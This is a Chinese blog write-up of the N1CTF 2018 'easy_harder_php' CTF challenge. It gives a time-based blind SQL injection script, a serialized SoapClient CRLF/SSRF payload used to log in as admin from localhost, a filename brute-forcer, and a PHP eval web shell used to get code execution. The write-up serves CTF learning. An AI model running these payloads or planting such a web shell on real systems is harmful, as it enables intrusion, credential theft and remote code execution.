[N1CTF 2018]easy_harder_php soap_ssrf

最新推荐文章于 2024-04-26 13:53:30 发布
最新推荐文章于 2024-04-26 13:53:30 发布
阅读量2k 收藏 2
点赞数 1
分类专栏: BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/104088080
版权

0x01 题目介绍

扫描目录得到源码
在这里插入图片描述

    function publish()
    {
        if(!$this->check_login()) return false;
        if($this->is_admin == 0)
        {
            if(isset($_POST['signature']) && isset($_POST['mood'])) {

                $mood = addslashes(serialize(new Mood((int)$_POST['mood'],get_ip())));
                $db = new Db();
                @$ret = $db->insert(array('userid','username','signature','mood'),'ctf_user_signature',array($this->userid,$this->username,$_POST['signature'],$mood));
                if($ret)
                    return true;
                else
                    return false;
            }
        }
        else
        {
                if(isset($_FILES['pic'])) {
                    if (upload($_FILES['pic'])){
                        echo 'upload ok!';
                        return true;
                    }
                    else {
                        echo "upload file error";
                        return false;
                    }
                }
                else
                    return false;
        }

    }

我们必须admin登录才会有上传功能,所以寻找注入点得到admin的密码
在这里插入图片描述$_POST[‘signature’]没有过滤就插入到数据库中,所以我们从这儿注入得到账号密码
在这里插入图片描述这儿将所有的反引号转换成了单引号,所以我们的

payload:

# encoding=utf-8


import  requests
import string
import time

url = 'http://03676d01-b591-4767-84ca-f49d98ea50a8.node3.buuoj.cn/index.php?action=publish'
cookies = {"PHPSESSID": "e949kgjjg7nm1k70ohatg52ac6"}
data = {
	"signature": "",
	"mood": 0
}
table = string.digits + string.lowercase + string.uppercase


def post():
        password = ""
        for i in range(1, 33):
                for j in table:
                    signature = "1`,if(ascii(substr((select password from ctf_users where username=0x61646d696e),%d,1))=%d,sleep(3),0))#"%(i, ord(j))			    #这儿的0x61646d696e是admin的十六进制,当然用`admin`代替也可以
                    data["signature"] = signature
			#print(data)
                    try:
                            re = requests.post(url, cookies = cookies, data = data, timeout = 3)
            #print(re.text)
                    except:
                        password += j
                        print(password)
                        break
        print(password)

def main():
	post()

if __name__ == '__main__':
	main()

注入得到密码的md5码,解密得到
在这里插入图片描述账号密码为admin,nu1ladmin

但是我们无法用这个登录,因为他限制了必须是127.0.0.1登录
在这里插入图片描述所以我们必须找到 ssrf来登录admin
在这里插入图片描述
这儿有一个反序列化,而$row[2]的数据mood我们可控,参考上面的注入~~

于是我们便可以在mood中插入序列化的soap类,然后进行ssrf,这儿简要说一下过程,方便大家理解

首先我们打开两个浏览器,分别对应一个页面,其中一个先别登录,另一个我们用来注册登录自己的非admin账号,然后在publish页面插入序列化的soap类。
这儿给出soap的构造代码

<?php
$target = 'http://127.0.0.1/index.php?action=login';
$post_string = 'username=admin&password=nu1ladmin&code=jRl3';
$headers = array(
    'X-Forwarded-For: 127.0.0.1',
    'Cookie: PHPSESSID=e6d3o0c1bh2a119fh01etdi000'
    );
$b = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'      => "aaab"));

$aaa = serialize($b);
$aaa = str_replace('^^',"\r\n",$aaa);
$aaa = str_replace('&','&',$aaa);
echo bin2hex($aaa);
?>

这儿需要注意两个地方,第一个地方是$post_string中的code参数和PHPSESSID必须和我们另外一个浏览器准备用来登录的admin相对应~~
在这里插入图片描述然后注入即可
在这里插入图片描述这个时候还不能刷新另外一个浏览器,因为此时我们只是把数据放在了数据库中,我们还没有触发,我们必须用我们自己的账号刷新一下?action=index的页面,才能触发~~
在这里插入图片描述此时我们再刷新一下用来登录admin的浏览器就可以登录上了~~
我们之所以反序列化soap类后能登录admin,是因为

$mood = unserialize($row[2]);
$country = $mood->getcountry();

我们知道此时$mood就是一个soap类,所以这个类没有getcountry()方法,此时就会触发soap类的__call()魔法函数就能实现登录了~~

然后我们就能看到上传文件的页面了~~

if(move_uploaded_file($uploaded_file,$move_to_file)) {
            if(stripos(file_get_contents($move_to_file),'<?php')>=0)
                system('sh /home/nu1lctf/clean_danger.sh');
            return $file_true_name;
        }
  • 首先是只能上传图片,而且上传的文件不能有<?php, 这儿可以用<?=<script language='php'>代替
  • 但是最后会执行一段sh命令,我们可以问价包含看看sh文件的内容
    -在这里插入图片描述
    这儿就需要用到linux的一个小trick了,当我们的文件名是以-开头时这个命令会报错~~
    在这里插入图片描述所以我们的思路就是上传一个以-开头的图片码,然后再爆破出上传的文件名~~
$file_true_name = $file_true_name.time().rand(1,100).'.jpg';

我们最主要的是获取time()的值,我们可以在上传的瞬间马上点击上传,虽然有一两秒的误差,但是并不影响~~

<?php
date_default_timezone_set("PRC");  ###一定要注意设置这个时区
echo time();
?>

最后我们再写一个脚本爆破一下~~

# -*- coding:utf-8 -*-

import requests
time = 158002449200				#我们上传的time()为1580024492,之所以加两位是后面的rand(1,100),而且我们从0到9999累加,就可以计算出我们的计算时间和上传时间的误差了~~	
url = 'http://c2cae93a-2024-48c4-a4d9-7c6f71d20bcd.node3.buuoj.cn/index.php?action=../../../../app/adminpic/-xx{}.jpg'
for i in range(10000):
    tmp = time + i
    ul = url.format(tmp)
    html = requests.get(ul).status_code
    print(i)    
    if html == 200:
        print(ul)   
        break

这儿说明一下我上传的图片马~

<script language="php"> 
$_POST["xxx"]=str_replace("[","'",$_POST["xxx"]);
$_POST["xxx"]=str_replace("]","'",$_POST["xxx"]);
echo $_POST["xxx"];
eval($_POST["xxx"]);
 </script>

由于题目过了了我们的输入所以,没办法使用引号和单引号,我们用"[",和"]"代替,这样就不会被过滤掉了~

function addsla_all()
{
    if (!get_magic_quotes_gpc())
    {
        if (!empty($_GET))
        {
            $_GET  = addslashes_deep($_GET);
        }
        if (!empty($_POST))
        {
            $_POST = addslashes_deep($_POST);
        }
        $_COOKIE   = addslashes_deep($_COOKIE);
        $_REQUEST  = addslashes_deep($_REQUEST);
    }
}
addsla_all();

在这里插入图片描述






这道题目还有几个非预期解,但是复现的时候,已经修复好了~~

但是这儿也记录一下~~

1、session.upload开启导致包含漏洞
2、xdebug

在这里插入图片描述当 X-Forwarded-For 的地址(这里就是:ricterz.me)的 9000 端口收到连接请求,就可以确定开启了 Xdebug,且开启了 xdebug.remote_connect_back。

3、/tmp/临时文件竞争

要使用临时文件竞争,前提是能够访问phpinfo的页面~~



参考链接:
N1CTF easy_harder_php预期解法
N1CTF easy_harder_php非预期解法
官方writeup

HyyMbb
关注
专栏目录
【网络安全 | CTF】护网杯2018easy_tornado解题详析(Tornado之SSTI注入)
等风来
08-24 3949
提示:filename先被md5加密后,结合cookie_secret,再次被md5加密姿势进入页面给出三个链接:提示:filename先被md5加密后,结合cookie_secret,再次被md5加密先加密filename:得到:3bf9f6cf685a6dd8defadabfb41先加密filename:可知存在模板注入,而Tornado框架的附属文件handler.settings中存在cookie_secret故get传参:/error?msg={{handler.settings}}得到
【网络安全 | CTF】攻防世界 very_easy_sql 解题详析(gopher协议+ssrf漏洞sql注入+盲注脚本)
等风来
08-01 8522
登录处直接注入会提示you are not an inner user, so we can not let you have identify~查看源代码发现use.php,访问后猜测该题为基于ssrf漏洞的sql注入:因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。
攻防世界 easyphp
qq_53105813的博客
12-13 979
攻防世界 wp
2018 n1ctf easy_hard_php 攻击流程图
lylong0703的博客
09-09 191
2018 n1ctf easy_hard_php 攻击流程图 sqli , clrf , ssrf 流程图 if have any error please figer out ,thank you very much! (my win10’s input method is down suddenly) i’m a beginner of Cyberspace Security.
session_start()&bestphp 考查session_start&soap ssrf
a3320315的博客
01-19 845
0x01 bestphp1 首先贴出这道题的源代码 <html> <head> <title>BabyPHP</title> <meta charset='UTF-8'> </head> <body> <form action='#' method='post'> ...
从一道题中学习Soap SSRF和phar反序列化组合拳
weixin_51804748的博客
01-24 3027
class.php <?php class upload { public $check; public $tmp_name; public $filename; public function __construct($tmp_name, $filename) { $this->check = new Check(); $this->filename = $filename; $this-&gt
ctfshow-SSRF
qq_45655564的博客
07-01 470
web351-普通的ssrf本地访问 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?&
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf (easy_eval)
Glacier_Mount的博客
07-02 1773
反序列化、redis
inno_ctf_2018_quals
05-16
InnoCTF 2018资格赛,任务和解决方案 所需的任务文件 按类别 网页 加密货币 竞价排名 TCP反向 重要时间 佩罗维奇克 :cross_mark: 你现在德威吗? 法证 现在接吻 :cross_mark: 点击它! 生日 间谍无处不在 :...
BMZCTF n1ctf/hard_php
qq_26243045的博客
11-29 410
考点:文件包含 打开页面,是一个登录框,带有验证码。 进行目录扫描: 发现index.php~,进行访问: 可以看到源码 Action参数可以访问文件,试用../../../../etc/passwd看能不能穿越目录访问: 看到可以访问,再试试../../../../flag 得到了flag ...
CTF MISC系列——3、Challenge
Fly_鹏程万里
04-12 1753
题目:解题思路:一下子看没有看出来,很是奇怪为啥一开始就给出了这样一个没有任何规律的字符串,让直接提交flag。。。。。。。。,加密?base 64?不可能,之后想了一下,仔细一看有0——F,发现应该是与十六进制有关,那么十六进制转换为十进制呢?第一个66转换为十进制为102对应的ASCII值为“f”,想到提交格式“flag{XXX}”,看来是有点门道了,所以继续试试 6c对应十进制为110——对...
[Web安全学习] SSRF漏洞分析
Y1seco的博客
08-18 378
SSRF漏洞相关总结SoapClient反序列化SSRF SoapClient反序列化SSRF 参考文章
N1CTF easy_php学到的几个骚操作
Sp4rkW的博客
03-19 4663
认真的拜读了师傅们关于N1CTF的各种writeup,收获了不少骚操作,记录下以备查找。 反序列化点SoapClient php自带类的利用 #使用的是SoapClient这个php自带类 # 当反序列化出来的对象调用不存在的函数是,就会调用__call方法,向外发送请求 $a = new SoapClient(null, array( 'location'=&amp;...
SoapClient反序列化SSRF
蚁景网安学院
09-02 1480
序列化中的魔术方法https://www.php.net/manual/zh/language.oop5.magic.phpconstruct(), destruct(), call()...
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
最新发布
2401_84252281的博客
04-26 996
任务环境说明:服务器场景:Server1。
ctf 监听端口_SSRF 漏洞分析与利用(含 CTF 例题)
weixin_33404919的博客
01-13 1625
原标题:SSRF 漏洞分析与利用(含 CTF 例题)16004488 总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的。 一、漏洞产生以curl为例,漏洞代码为ssrf.php$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_GET['url']);#curl_setopt($ch, CURLOPT_FOLLOWLOC...
[NISACTF 2022]上
qq_62046696的博客
07-26 4334
php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值